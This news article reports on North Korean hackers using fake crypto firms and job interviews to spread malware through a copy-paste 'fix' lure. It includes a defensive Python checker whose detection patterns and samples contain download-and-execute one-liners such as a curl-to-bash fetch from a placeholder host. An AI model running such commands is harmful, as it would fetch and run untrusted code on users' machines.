
North Korean hackers set up 3 shell companies to scam crypto devs



A subgroup of the North Korea-linked hacker group Lazarus set up three shell companies, two of them in the US, to deliver malware to unsuspecting users.

The three sham crypto consulting companies — BlockNovas, Angeloper Company and SoftGlide — are being used by the North Korean hacker group Contagious Interview to distribute malware through fake job interviews, Silent Push Threat Analysts said in an April 24 report.

Silent Push senior threat analyst Zach Edwards said in an April 24 statement on X that two of the shell companies are registered as legitimate businesses in the United States.

“These websites and a large network of accounts on hiring/recruiting websites are being used to trick people into applying for jobs,” he said.

“During the job application process an error message is displayed as someone tries to record an introduction video. The solution is a simple click fix copy and paste trick, which leads to malware if the unsuspecting developer completes the process.”

During the sham job interview, an error message is displayed, requiring the user to click, copy and paste to fix it, which leads to the malware infection. Source: Zach Edwards
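The copy-and-paste "fix" step described above is the point where a defender can intervene: whatever the fake interview page asks the developer to run has to pass through the clipboard first. As an added example (not code from the original article or from Silent Push), the Python check below inspects a pasted command before it is executed and flags the generic download-and-execute and obfuscation patterns such lures rely on. The indicator list, the `assess_pasted_command` function name and the sample commands are constructed assumptions for this example, not indicators published for this campaign.

```python
import re
import unicodedata

# Generic indicators for a "paste this to fix the error" command.
# These are assumptions of this example, chosen to illustrate the
# technique; they are not the campaign's published indicators.
INDICATORS = [
    # downloader piped straight into an interpreter
    ("download_then_execute",
     re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b[^|;&]*\|\s*"
                r"(sh|bash|zsh|python3?|node|powershell|pwsh)\b", re.I)),
    # an encoded stage decoded on the fly hides what actually runs
    ("base64_decode_stage",
     re.compile(r"base64\s+(-d|--decode)|FromBase64String", re.I)),
    # string evaluation, the usual second half of a one-liner dropper
    ("eval_of_string",
     re.compile(r"\b(eval|Invoke-Expression|iex)\b", re.I)),
    # interpreter invoked on the output of a downloader
    ("shell_of_download_output",
     re.compile(r"\b(sh|bash)\s+-c\s+[\"']?\s*\$\((curl|wget)", re.I)),
]

# Zero-width characters let a lure hide part of the command from the
# reader while the shell still sees it.
ZERO_WIDTH = {"\u200b", "\u200c", "\u200d", "\u2060", "\ufeff"}


def assess_pasted_command(cmd):
    """Return a verdict and the list of indicators found in `cmd`.

    A command that trips no indicator is 'allow'; anything else is
    'block' so a human can read it before it runs.
    """
    findings = []

    if any(ch in ZERO_WIDTH for ch in cmd):
        findings.append("zero_width_characters")

    # control characters other than newline/tab are never typed on purpose
    if any(unicodedata.category(ch) == "Cc" and ch not in "\n\t" for ch in cmd):
        findings.append("control_characters")

    # a trailing newline makes the command run the moment it is pasted
    if cmd.endswith("\n"):
        findings.append("trailing_newline_autoruns_on_paste")

    for name, pattern in INDICATORS:
        if pattern.search(cmd):
            findings.append(name)

    return {"verdict": "block" if findings else "allow", "findings": findings}


if __name__ == "__main__":
    # Constructed sample commands; the domain is the reserved .invalid TLD.
    samples = [
        "npm install",
        "curl -s https://example.invalid/fix.sh | bash",
        "echo aGVsbG8= | base64 -d | sh\n",
        "npm install\u200b",
    ]
    for sample in samples:
        print(repr(sample), "->", assess_pasted_command(sample))
```

The check is deliberately conservative: it does not try to decide whether a command is malicious, only whether it has the shape of a paste-to-execute lure, so that a developer who is told "just paste this to fix the recording error" gets a prompt to read it first instead of running it blind.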

Three strains of malware — BeaverTail, InvisibleFerret and OtterCookie — are being used, according to Silent Push.

BeaverTail is malware primarily designed for information theft and to load further stages of malware. OtterCookie and InvisibleFerret mainly target sensitive information, including crypto wallet keys and clipboard data.

Silent Push analysts said in the report that the hackers use GitHub, job listings and freelancer websites to look for victims.

AI used to create fake employees

The ruse also involves the hackers using AI-generated images to create profiles of employees for the three front crypto companies, as well as stealing images of real people.

“There are numerous fake employees and stolen images from real people being used across this network. We’ve documented some of the obvious fakes and stolen images, however it’s important to realize that the impersonation efforts from this campaign are different,” Edwards said.

“In one of the examples, the threat actors took a real photo from a real person, and then appeared to have run it through an AI image modifier tool to create a subtly different version of that same image.”

Related: Fake Zoom malware steals crypto while it’s ‘stuck’ loading, user warns

This malware campaign has been ongoing since 2024. Edwards says there are known public victims.

Silent Push identified two developers targeted by the campaign; one of them reportedly had their MetaMask wallet compromised.

The FBI has since shut down at least one of the companies.

“The Federal Bureau of Investigation (FBI) acquired the Blocknovas domain, but Softglide is still live, along with some of their other infrastructure,” Edwards said.

At least three crypto founders reported in March that they foiled an attempt from alleged North Korean hackers to steal sensitive data through fake Zoom calls.

Groups such as the Lazarus Group are the prime suspects in some of the biggest cyber thefts in Web3, including the Bybit $1.4 billion hack and the $600 million Ronin network hack.

Magazine: Lazarus Group’s favorite exploit revealed — Crypto hacks analysis


